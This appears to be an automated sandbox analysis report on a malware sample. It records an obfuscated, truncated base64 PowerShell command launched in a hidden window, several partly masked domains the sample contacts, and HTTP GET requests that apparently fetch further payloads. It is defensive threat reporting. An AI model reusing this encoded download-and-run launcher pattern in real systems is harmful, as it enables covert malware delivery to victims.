Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e KABuAEUAVwAtAG8AYgBKAEUAYwBUACAAIABTAFkAcwBUAGUAbQAuAGkAbwAuAHMAVAByAGUAQQBNAHIAZQBBAEQARQBSACgAKABuAEUAVwAtAG8AYgBKAEUAYwBUACAAIABTAHkAUwB0AEUATQAuAGkATwAuAGMAbwBNAFAAcgBFAHMAUwBJAE8AbgAuAG...
Network activity
Connects to
- 'ca###ewinds.com':80
- 'ty####.tybit.com':80
- 'ma###awards.com':443
- 'vi##om.cz':80
- 'sh##ab.ps':80
- 'sh##ab.ps':443
- 'ja###cevera.com':80
TCP
HTTP GET requests
- http://ca###ewinds.com/9T8dz/
- http://ty####.tybit.com/?na##################
- http://vi##om.cz/vsPjbD/
- http://sh##ab.ps/vb2/attachments/RLkR/
- http://ja###cevera.com/KCWt3P/
Other
- 'ma###awards.com':443
- 'sh##ab.ps':443
UDP
- DNS ASK ca###ewinds.com
- DNS ASK ty####.tybit.com
- DNS ASK ma###awards.com
- DNS ASK vi##om.cz
- DNS ASK sh##ab.ps
- DNS ASK ja###cevera.com
- DNS ASK ru##to.ru
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e KABuAEUAVwAtAG8AYgBKAEUAYwBUACAAIABTAFkAcwBUAGUAbQAuAGkAbwAuAHMAVAByAGUAQQBNAHIAZQBBAEQARQBSACgAKABuAEUAVwAtAG8AYgBKAEUAYwBUACAAIABTAHkAUwB0AEUATQAuAGkATwAuAGMAbwBNAFAAcgBFAHMAUwBJAE8AbgAuAG...' (with hidden window)
